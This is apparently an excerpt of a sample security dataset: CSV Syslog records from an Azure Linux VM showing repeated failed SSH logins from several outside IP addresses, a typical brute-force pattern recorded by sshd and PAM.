+472,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:08,UbuntuDevEnv,2019-06-26 17:45:08,auth,UbuntuDevEnv,info,Disconnected from invalid user rrashid 58.87.109.107 port 34368 [preauth],53972,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,rrashid,58.87.109.1,34368,,
+473,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:24,UbuntuDevEnv,2019-06-26 17:45:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+474,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:24,UbuntuDevEnv,2019-06-26 17:45:24,auth,UbuntuDevEnv,info,Invalid user l4d2server from 107.175.127.237 port 46306,54027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,l4d2server,107.175.127.2,46306,,
+475,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:24,UbuntuDevEnv,2019-06-26 17:45:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237,54027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,107.175.127.2,,0,
+476,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:26,UbuntuDevEnv,2019-06-26 17:45:26,auth,UbuntuDevEnv,info,Failed password for invalid user l4d2server from 107.175.127.237 port 46306 ssh2,54027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,l4d2server,107.175.127.2,46306,,
+477,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:26,UbuntuDevEnv,2019-06-26 17:45:26,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 46306:11: Bye Bye [preauth],54027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,46306,,
+478,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:26,UbuntuDevEnv,2019-06-26 17:45:26,auth,UbuntuDevEnv,info,Disconnected from invalid user l4d2server 107.175.127.237 port 46306 [preauth],54027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,l4d2server,107.175.127.2,46306,,
+479,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:42,UbuntuDevEnv,2019-06-26 17:45:42,auth,UbuntuDevEnv,info,Invalid user hamish from 157.230.190.1 port 56166,54157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hamish,157.230.190.1,56166,,
+480,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:42,UbuntuDevEnv,2019-06-26 17:45:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+481,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:42,UbuntuDevEnv,2019-06-26 17:45:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,54157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+482,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:44,UbuntuDevEnv,2019-06-26 17:45:43,auth,UbuntuDevEnv,info,Failed password for invalid user hamish from 157.230.190.1 port 56166 ssh2,54157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hamish,157.230.190.1,56166,,
+483,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:44,UbuntuDevEnv,2019-06-26 17:45:43,auth,UbuntuDevEnv,info,Disconnected from invalid user hamish 157.230.190.1 port 56166 [preauth],54157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hamish,157.230.190.1,56166,,
+484,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:44,UbuntuDevEnv,2019-06-26 17:45:43,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 56166:11: Bye Bye [preauth],54157,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,56166,,
+485,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:50,UbuntuDevEnv,2019-06-26 17:45:49,auth,UbuntuDevEnv,info,Invalid user it from 54.37.66.73 port 59899,54194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,it,54.37.66.7,59899,,
+486,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:50,UbuntuDevEnv,2019-06-26 17:45:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+487,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:50,UbuntuDevEnv,2019-06-26 17:45:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,54194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+488,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:51,UbuntuDevEnv,2019-06-26 17:45:50,auth,UbuntuDevEnv,info,Failed password for invalid user it from 54.37.66.73 port 59899 ssh2,54194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,it,54.37.66.7,59899,,
+489,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:51,UbuntuDevEnv,2019-06-26 17:45:51,auth,UbuntuDevEnv,info,Disconnected from invalid user it 54.37.66.73 port 59899 [preauth],54194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,it,54.37.66.7,59899,,
+490,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:51,UbuntuDevEnv,2019-06-26 17:45:51,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 59899:11: Bye Bye [preauth],54194,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,59899,,
+491,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:45:59,UbuntuDevEnv,2019-06-26 17:45:59,auth,UbuntuDevEnv,info,Connection closed by 104.47.157.103 port 54280 [preauth],54226,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,104.47.157.1,54280,,
+492,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:46:26,UbuntuDevEnv,2019-06-26 17:46:26,auth,UbuntuDevEnv,info,Invalid user czerda from 111.230.29.17 port 34754,54318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,czerda,111.230.29.1,34754,,
+493,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:46:26,UbuntuDevEnv,2019-06-26 17:46:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+494,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:46:26,UbuntuDevEnv,2019-06-26 17:46:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,54318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+495,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:46:28,UbuntuDevEnv,2019-06-26 17:46:28,auth,UbuntuDevEnv,info,Failed password for invalid user czerda from 111.230.29.17 port 34754 ssh2,54318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,czerda,111.230.29.1,34754,,
+496,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:46:28,UbuntuDevEnv,2019-06-26 17:46:28,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 34754:11: Bye Bye [preauth],54318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,34754,,
+497,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:46:28,UbuntuDevEnv,2019-06-26 17:46:28,auth,UbuntuDevEnv,info,Disconnected from invalid user czerda 111.230.29.17 port 34754 [preauth],54318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,czerda,111.230.29.1,34754,,
+498,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:46:36,UbuntuDevEnv,2019-06-26 17:46:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107  user=test,54358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,58.87.109.1,,0,
+499,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:46:38,UbuntuDevEnv,2019-06-26 17:46:37,auth,UbuntuDevEnv,info,Failed password for test from 58.87.109.107 port 49466 ssh2,54358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,49466,,
+500,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:46:38,UbuntuDevEnv,2019-06-26 17:46:37,auth,UbuntuDevEnv,info,Received disconnect from 58.87.109.107 port 49466:11: Bye Bye [preauth],54358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.87.109.1,49466,,
+501,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:46:38,UbuntuDevEnv,2019-06-26 17:46:37,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 58.87.109.107 port 49466 [preauth],54358,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,58.87.109.1,49466,,
+502,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:16,UbuntuDevEnv,2019-06-26 17:47:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=104.248.187.165  user=mysql,54494,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysql,104.248.187.1,,0,
+503,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:17,UbuntuDevEnv,2019-06-26 17:47:17,auth,UbuntuDevEnv,info,Invalid user client1 from 54.37.66.73 port 40260,54511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client1,54.37.66.7,40260,,
+504,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:17,UbuntuDevEnv,2019-06-26 17:47:17,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=54.37.66.73,54511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,54.37.66.7,,0,
+505,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:17,UbuntuDevEnv,2019-06-26 17:47:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+506,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:19,UbuntuDevEnv,2019-06-26 17:47:18,auth,UbuntuDevEnv,info,Failed password for mysql from 104.248.187.165 port 43996 ssh2,54494,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.187.1,43996,,
+507,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:19,UbuntuDevEnv,2019-06-26 17:47:19,auth,UbuntuDevEnv,info,"Received disconnect from 104.248.187.165 port 43996:11: Normal Shutdown, Thank you for playing [preauth]",54494,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,104.248.187.1,43996,,
+508,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:19,UbuntuDevEnv,2019-06-26 17:47:19,auth,UbuntuDevEnv,info,Disconnected from authenticating user mysql 104.248.187.165 port 43996 [preauth],54494,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,mysql,104.248.187.1,43996,,
+509,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:19,UbuntuDevEnv,2019-06-26 17:47:19,auth,UbuntuDevEnv,info,Failed password for invalid user client1 from 54.37.66.73 port 40260 ssh2,54511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client1,54.37.66.7,40260,,
+510,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:19,UbuntuDevEnv,2019-06-26 17:47:19,auth,UbuntuDevEnv,info,Received disconnect from 54.37.66.73 port 40260:11: Bye Bye [preauth],54511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,54.37.66.7,40260,,
+511,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:19,UbuntuDevEnv,2019-06-26 17:47:19,auth,UbuntuDevEnv,info,Disconnected from invalid user client1 54.37.66.73 port 40260 [preauth],54511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,client1,54.37.66.7,40260,,
+512,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:27,UbuntuDevEnv,2019-06-26 17:47:27,auth,UbuntuDevEnv,info,Invalid user ryder from 157.230.190.1 port 44504,54536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ryder,157.230.190.1,44504,,
+513,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:27,UbuntuDevEnv,2019-06-26 17:47:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+514,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:27,UbuntuDevEnv,2019-06-26 17:47:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.190.1,54536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.190.1,,0,
+515,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:30,UbuntuDevEnv,2019-06-26 17:47:29,auth,UbuntuDevEnv,info,Failed password for invalid user ryder from 157.230.190.1 port 44504 ssh2,54536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ryder,157.230.190.1,44504,,
+516,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:30,UbuntuDevEnv,2019-06-26 17:47:29,auth,UbuntuDevEnv,info,Received disconnect from 157.230.190.1 port 44504:11: Bye Bye [preauth],54536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.190.1,44504,,
+517,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:30,UbuntuDevEnv,2019-06-26 17:47:29,auth,UbuntuDevEnv,info,Disconnected from invalid user ryder 157.230.190.1 port 44504 [preauth],54536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ryder,157.230.190.1,44504,,
+518,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:34,UbuntuDevEnv,2019-06-26 17:47:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=107.175.127.237  user=root,54566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,107.175.127.2,,0,
+519,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:36,UbuntuDevEnv,2019-06-26 17:47:36,auth,UbuntuDevEnv,info,Failed password for root from 107.175.127.237 port 35262 ssh2,54566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,35262,,
+520,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:37,UbuntuDevEnv,2019-06-26 17:47:36,auth,UbuntuDevEnv,info,Received disconnect from 107.175.127.237 port 35262:11: Bye Bye [preauth],54566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,107.175.127.2,35262,,
+521,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:37,UbuntuDevEnv,2019-06-26 17:47:36,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 107.175.127.237 port 35262 [preauth],54566,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,107.175.127.2,35262,,
+522,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:56,UbuntuDevEnv,2019-06-26 17:47:55,auth,UbuntuDevEnv,info,Invalid user niang from 111.230.29.17 port 48130,54638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,niang,111.230.29.1,48130,,
+523,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:56,UbuntuDevEnv,2019-06-26 17:47:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+524,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:56,UbuntuDevEnv,2019-06-26 17:47:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,54638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+525,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:56,UbuntuDevEnv,2019-06-26 17:47:56,auth,UbuntuDevEnv,info,Invalid user openproject from 58.87.109.107 port 64614,54644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,openproject,58.87.109.1,64614,,
+526,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:56,UbuntuDevEnv,2019-06-26 17:47:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.87.109.107,54644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.87.109.1,,0,
+527,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:56,UbuntuDevEnv,2019-06-26 17:47:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+528,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:58,UbuntuDevEnv,2019-06-26 17:47:57,auth,UbuntuDevEnv,info,Failed password for invalid user niang from 111.230.29.17 port 48130 ssh2,54638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,niang,111.230.29.1,48130,,
+529,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:58,UbuntuDevEnv,2019-06-26 17:47:57,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 48130:11: Bye Bye [preauth],54638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,48130,,
+530,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:58,UbuntuDevEnv,2019-06-26 17:47:57,auth,UbuntuDevEnv,info,Disconnected from invalid user niang 111.230.29.17 port 48130 [preauth],54638,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,niang,111.230.29.1,48130,,
+531,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:47:58,UbuntuDevEnv,2019-06-26 17:47:57,auth,UbuntuDevEnv,info,Failed password for invalid user openproject from 58.87.109.107 port 64614 ssh2,54644,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,openproject,58.87.109.1,64614,,
